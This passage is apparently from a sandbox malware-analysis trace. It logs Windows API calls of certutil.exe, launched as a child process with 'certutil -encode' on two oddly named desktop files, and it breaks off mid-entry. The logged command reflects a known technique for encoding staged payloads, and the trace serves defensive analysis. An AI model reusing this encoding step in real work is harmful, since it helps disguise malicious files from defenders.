[0257.054] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0257.054] DllMain () returned 0x1 [0257.054] LocalFree (hMem=0x22b55c1b920) returned 0x0 [0257.054] LocalFree (hMem=0x22b55c14cc0) returned 0x0 [0257.054] LocalFree (hMem=0x22b55c31050) returned 0x0 [0257.054] LocalFree (hMem=0x22b55c316b0) returned 0x0 [0257.054] LocalFree (hMem=0x22b55c08cf0) returned 0x0 [0257.054] LocalFree (hMem=0x22b55c312c0) returned 0x0 [0257.054] LocalFree (hMem=0x22b55c0bb60) returned 0x0 [0257.054] LocalFree (hMem=0x22b55c146f0) returned 0x0 [0257.055] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0257.055] GetLastError () returned 0x7e [0257.055] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0257.055] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0257.055] DllMain () returned 0x1 [0257.055] exit (_Code=0) Thread: id = 86 os_tid = 0x4f8 Thread: id = 87 os_tid = 0xf58 Process: id = "32" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x24e10000" os_pid = "0x1248" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"vkmlI37o0H7OT_ Ymw.bmp.Sister\" \"vkmlI37o0H7OT_ Ymw.bmp.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 88 os_tid = 0xe34 [0259.270] GetStartupInfoW (in: lpStartupInfo=0x702cefeb0 | out: lpStartupInfo=0x702cefeb0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"vkmlI37o0H7OT_ Ymw.bmp.Sister\" \"vkmlI37o0H7OT_ Ymw.bmp.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0259.276] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0259.276] __set_app_type (_Type=0x1) [0259.276] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0259.276] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0259.279] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0259.279] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0259.280] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0259.280] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0259.280] WerSetFlags () returned 0x0 [0259.280] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0259.280] __iob_func () returned 0x7ffcea2dea00 [0259.281] _fileno (_File=0x7ffcea2dea30) returned 1 [0259.281] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0259.281] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0259.282] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0259.282] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0259.282] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0259.283] GetConsoleOutputCP () returned 0x1b5 [0259.355] _vsnwprintf (in: _Buffer=0x702cefe20, _BufferCount=0xb, _Format=".%d", _ArgList=0x702cefd48 | out: _Buffer=".437") returned 4 [0259.355] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0259.355] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0259.355] GetFileType (hFile=0x50) returned 0x2 [0259.356] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0259.356] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0259.356] SetThreadUILanguage (LangId=0x0) returned 0x409 [0259.485] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0259.485] GetCommandLineW () returned="certutil -encode \"vkmlI37o0H7OT_ Ymw.bmp.Sister\" \"vkmlI37o0H7OT_ Ymw.bmp.Cruel\"" [0259.485] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1b261c8bef0 [0259.485] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1b261c7cec0 [0259.485] LocalFree (hMem=0x1b261c8bef0) returned 0x0 [0259.486] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1b261c81f70 [0259.486] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x1b261c81e80 [0259.486] LocalFree (hMem=0x1b261c81f70) returned 0x0 [0259.486] LocalFree (hMem=0x1b261c7cec0) returned 0x0 [0259.486] LocalFree (hMem=0x0) returned 0x0 [0259.486] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0259.486] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0259.487] GetCommandLineW () returned="certutil -encode \"vkmlI37o0H7OT_ Ymw.bmp.Sister\" \"vkmlI37o0H7OT_ Ymw.bmp.Cruel\"" [0259.487] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1b261c8be50 [0259.487] GetSystemTime (in: lpSystemTime=0x702cefb10 | out: lpSystemTime=0x702cefb10*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x31, wSecond=0x22, wMilliseconds=0x1b)) [0259.487] SystemTimeToFileTime (in: lpSystemTime=0x702cefb10, lpFileTime=0x702cefb08 | out: lpFileTime=0x702cefb08) returned 1 [0259.487] FileTimeToLocalFileTime (in: lpFileTime=0x702cefb08, lpLocalFileTime=0x702cefad0 | out: lpLocalFileTime=0x702cefad0) returned 1 [0259.487] FileTimeToSystemTime (in: lpFileTime=0x702cefad0, lpSystemTime=0x702cef840 | out: lpSystemTime=0x702cef840) returned 1 [0259.487] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x702cef840, lpFormat=0x0, lpDateStr=0x702cef950, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0259.487] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x702cef840, lpFormat=0x0, lpTimeStr=0x702cef850, cchTime=128 | out: lpTimeStr="8:49 PM") returned 8 [0259.487] _vsnwprintf (in: _Buffer=0x702cef85e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x702cef828 | out: _Buffer=" 34.027s") returned 8 [0259.487] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x1b261c8e9d0 [0259.488] SetLastError (dwErrCode=0x80070716) [0259.488] _vsnwprintf (in: _Buffer=0x702cef8d8, _BufferCount=0xb, _Format="%d", _ArgList=0x702cef8c8 | out: _Buffer="948") returned 3 [0259.488] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x702cef690, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0259.488] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x1b261c8bd70 [0259.488] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x1b261c951d0 [0259.488] LocalFree (hMem=0x1b261c8e9d0) returned 0x0 [0259.488] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x702cefb80 | out: lpSystemTimeAsFileTime=0x702cefb80*(dwLowDateTime=0xc5469926, dwHighDateTime=0x1d6141f)) [0259.488] GetLocalTime (in: lpSystemTime=0x702cefbb8 | out: lpSystemTime=0x702cefbb8*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x31, wSecond=0x22, wMilliseconds=0x1c)) [0259.488] SystemTimeToFileTime (in: lpSystemTime=0x702cefbb8, lpFileTime=0x702cefb90 | out: lpFileTime=0x702cefb90) returned 1 [0259.488] CompareFileTime (lpFileTime1=0x702cefb90, lpFileTime2=0x702cefb80) returned 1 [0259.488] _vsnwprintf (in: _Buffer=0x702cefbc8, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x702cefb58 | out: _Buffer="GMT + 2.00") returned 10 [0259.489] LocalFree (hMem=0x1b261c8be50) returned 0x0 [0259.489] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0259.489] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0259.489] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0259.489] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0259.489] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0259.489] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x702cefbf8 | out: _Buffer="10.0.15063.447") returned 14 [0259.489] GetACP () returned 0x4e4 [0259.489] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0259.489] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1b261c8b910 [0259.489] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1b261c8b910, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0259.489] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1b261c8ec10 [0259.489] _vsnwprintf (in: _Buffer=0x1b261c8ec10, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x702cefc48 | out: _Buffer="10.0.15063.447 retail") returned 21 [0259.490] LocalFree (hMem=0x1b261c8b910) returned 0x0 [0259.490] LocalFree (hMem=0x0) returned 0x0 [0259.490] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0259.490] GetACP () returned 0x4e4 [0259.490] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0259.490] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1b261c8be50 [0259.490] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1b261c8be50, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0259.490] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1b261c8e990 [0259.490] _vsnwprintf (in: _Buffer=0x1b261c8e990, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x702cefc48 | out: _Buffer="10.0.15063.447 retail") returned 21 [0259.490] LocalFree (hMem=0x1b261c8be50) returned 0x0 [0259.490] LocalFree (hMem=0x0) returned 0x0 [0259.490] GetACP () returned 0x4e4 [0259.490] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0259.490] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1b261c8bc90 [0259.490] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1b261c8bc90, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0259.490] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1b261c8e690 [0259.491] _vsnwprintf (in: _Buffer=0x1b261c8e690, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x702cefc78 | out: _Buffer="10.0.15063.447 retail") returned 21 [0259.491] LocalFree (hMem=0x1b261c8bc90) returned 0x0 [0259.491] LocalFree (hMem=0x1b261c8ec10) returned 0x0 [0259.491] LocalFree (hMem=0x1b261c8e990) returned 0x0 [0259.491] LocalFree (hMem=0x1b261c8e690) returned 0x0 [0259.491] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0259.491] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0259.491] GetStockObject (i=0) returned 0x900010 [0259.491] RegisterClassW (lpWndClass=0x702cefda0) returned 0xc1a2 [0259.491] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x1b02c8 [0259.577] NtdllDefWindowProc_W () returned 0x0 [0259.577] NtdllDefWindowProc_W () returned 0x1 [0259.584] NtdllDefWindowProc_W () returned 0x0 [0259.595] UpdateWindow (hWnd=0x1b02c8) returned 1 [0259.595] PostMessageW (hWnd=0x1b02c8, Msg=0x400, wParam=0x0, lParam=0x1b261c7217e) returned 1 [0259.595] GetMessageW (in: lpMsg=0x702cefdf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x702cefdf0) returned 1 [0259.595] TranslateMessage (lpMsg=0x702cefdf0) returned 0 [0259.595] DispatchMessageW (lpMsg=0x702cefdf0) returned 0x0 [0259.596] NtdllDefWindowProc_W () returned 0x0 [0259.596] GetMessageW (in: lpMsg=0x702cefdf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x702cefdf0) returned 1 [0259.596] TranslateMessage (lpMsg=0x702cefdf0) returned 0 [0259.596] DispatchMessageW (lpMsg=0x702cefdf0) returned 0x0 [0259.596] LocalAlloc (uFlags=0x0, uBytes=0x8e) returned 0x1b261c74440 [0259.596] LocalAlloc (uFlags=0x0, uBytes=0xa2) returned 0x1b261c79190 [0259.596] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0259.596] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0259.596] SetLastError (dwErrCode=0x80070716) [0259.596] _vsnwprintf (in: _Buffer=0x702cef7f8, _BufferCount=0xb, _Format="%d", _ArgList=0x702cef7e8 | out: _Buffer="465") returned 3 [0259.596] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x702cef5b0, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0259.596] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1b261c821b0 [0259.597] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0259.597] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0259.597] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x702cef590, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0259.597] GetLastError () returned 0xcb [0259.597] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0259.597] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0259.597] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0259.597] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0259.597] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0259.597] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0259.597] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0259.597] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0259.597] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0259.597] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0259.597] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0259.598] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0259.598] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0259.598] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0259.598] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0259.598] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0259.598] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0259.598] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0259.598] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0259.598] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0259.598] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0259.598] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x702cef258 | out: phkResult=0x702cef258*=0x23c) returned 0x0 [0259.598] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x1b261c80ac0 [0259.598] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x702cef7c8, lpData=0x702cef7f8, lpcbData=0x702cef7c0*=0x4 | out: lpType=0x702cef7c8*=0x0, lpData=0x702cef7f8*=0x0, lpcbData=0x702cef7c0*=0x4) returned 0x2 [0259.598] LocalFree (hMem=0x1b261c80ac0) returned 0x0 [0259.598] RegCloseKey (hKey=0x23c) returned 0x0 [0259.598] LocalFree (hMem=0x0) returned 0x0 [0259.598] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x1b261c9cb40 [0259.611] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0259.611] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0259.611] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0259.611] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0259.611] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0259.611] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0259.611] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0259.611] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0259.611] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0259.611] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0259.611] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0259.611] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0259.611] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0259.611] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0259.611] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0259.611] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0259.611] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x1b261ca15e0 [0259.611] GetComputerNameW (in: lpBuffer=0x1b261ca15e0, nSize=0x702cef7c0 | out: lpBuffer="NQDPDE", nSize=0x702cef7c0) returned 1 [0259.612] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x702cef790 | out: lpBuffer=0x0, nSize=0x702cef790) returned 0 [0259.612] GetLastError () returned 0xea [0259.612] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1b261c8bdb0 [0259.612] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x1b261c8bdb0, nSize=0x702cef790 | out: lpBuffer="NQdPdE", nSize=0x702cef790) returned 1 [0259.612] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0259.698] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x1b261ca1c80, cbCertEncoded=0xb7a5) returned 0x0 [0259.701] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x1b261ca1c80, cbCrlEncoded=0xb7a5) returned 0x0 [0259.702] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x1b261ca1c80, cbEncoded=0xb7a5, dwFlags=0x8000, pDecodePara=0x702cef670, pvStructInfo=0x702cef700, pcbStructInfo=0x702cef6f4 | out: pvStructInfo=0x702cef700, pcbStructInfo=0x702cef6f4) returned 0 [0259.702] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x1b261ca1c80, cbEncoded=0xb7a5, dwFlags=0x8000, pDecodePara=0x702cef670, pvStructInfo=0x702cef700, pcbStructInfo=0x702cef6f4 | out: pvStructInfo=0x702cef700, pcbStructInfo=0x702cef6f4) returned 0 [0259.702] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x1b261ca1c80, cbEncoded=0xb7a5, dwFlags=0x8000, pDecodePara=0x702cef670, pvStructInfo=0x702cef700, pcbStructInfo=0x702cef6f4 | out: pvStructInfo=0x702cef700, pcbStructInfo=0x702cef6f4) returned 0 [0259.702] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x1b261c82d00 [0259.712] CryptMsgUpdate (hCryptMsg=0x1b261c82d00, pbData=0x1b261ca1c80, cbData=0xb7a5, fFinal=1) returned 0 [0259.712] GetLastError () returned 0x8009310b [0259.712] CryptMsgClose (hCryptMsg=0x1b261c82d00) returned 1 [0259.712] GetFileAttributesExW (in: lpFileName="vkmlI37o0H7OT_ Ymw.bmp.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\vkmli37o0h7ot_ ymw.bmp.sister"), fInfoLevelId=0x0, lpFileInformation=0x702cef720 | out: lpFileInformation=0x702cef720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9266f20, ftCreationTime.dwHighDateTime=0x1d5e2cf, ftLastAccessTime.dwLowDateTime=0xa269cc90, ftLastAccessTime.dwHighDateTime=0x1d5ef5c, ftLastWriteTime.dwLowDateTime=0xa269cc90, ftLastWriteTime.dwHighDateTime=0x1d5ef5c, nFileSizeHigh=0x0, nFileSizeLow=0xb7a5)) returned 1 [0259.712] _vsnwprintf (in: _Buffer=0x702cef728, _BufferCount=0xb, _Format="%d", _ArgList=0x702cef718 | out: _Buffer="359") returned 3 [0259.712] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x702cef4e0, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0259.712] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1b261ca1a90 [0259.713] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0259.713] _vsnwprintf (in: _Buffer=0x702cee710, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0x702cef768 | out: _Buffer="Input Length = 47013") returned 20 [0259.713] GetFileType (hFile=0x50) returned 0x2 [0259.713] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x702cee710*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x702cee6c4, lpReserved=0x0 | out: lpBuffer=0x702cee710*, lpNumberOfCharsWritten=0x702cee6c4*=0x14) returned 1 [0259.825] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0259.825] _vsnwprintf (in: _Buffer=0x702cee710, _BufferCount=0x1ff, _Format="\n", _ArgList=0x702cef768 | out: _Buffer="\n") returned 1 [0259.825] GetFileType (hFile=0x50) returned 0x2 [0259.826] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x702cee710*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x702cee6c4, lpReserved=0x0 | out: lpBuffer=0x702cee710*, lpNumberOfCharsWritten=0x702cee6c4*=0x1) returned 1 [0260.086] GetFileAttributesExW (in: lpFileName="vkmlI37o0H7OT_ Ymw.bmp.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\vkmli37o0h7ot_ ymw.bmp.cruel"), fInfoLevelId=0x0, lpFileInformation=0x702cef720 | out: lpFileInformation=0x702cef720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc58b6a35, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xc58b6a35, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xc598a152, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0xfcbc)) returned 1 [0260.086] _vsnwprintf (in: _Buffer=0x702cef728, _BufferCount=0xb, _Format="%d", _ArgList=0x702cef718 | out: _Buffer="361") returned 3 [0260.086] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x702cef4e0, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0260.086] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x1b261ca18e0 [0260.086] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0260.086] _vsnwprintf (in: _Buffer=0x702cee710, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x702cef768 | out: _Buffer="Output Length = 64700") returned 21 [0260.086] GetFileType (hFile=0x50) returned 0x2 [0260.086] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x702cee710*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x702cee6c4, lpReserved=0x0 | out: lpBuffer=0x702cee710*, lpNumberOfCharsWritten=0x702cee6c4*=0x15) returned 1 [0260.162] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0260.162] _vsnwprintf (in: _Buffer=0x702cee710, _BufferCount=0x1ff, _Format="\n", _ArgList=0x702cef768 | out: _Buffer="\n") returned 1 [0260.162] GetFileType (hFile=0x50) returned 0x2 [0260.162] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x702cee710*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x702cee6c4, lpReserved=0x0 | out: lpBuffer=0x702cee710*, lpNumberOfCharsWritten=0x702cee6c4*=0x1) returned 1 [0260.306] LocalFree (hMem=0x1b261ca1c80) returned 0x0 [0260.306] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0260.306] _vsnwprintf (in: _Buffer=0x702cef788, _BufferCount=0xb, _Format="%d", _ArgList=0x702cef778 | out: _Buffer="2022") returned 4 [0260.307] LoadStringW (in: hInstance=0x7ff70ad80000, 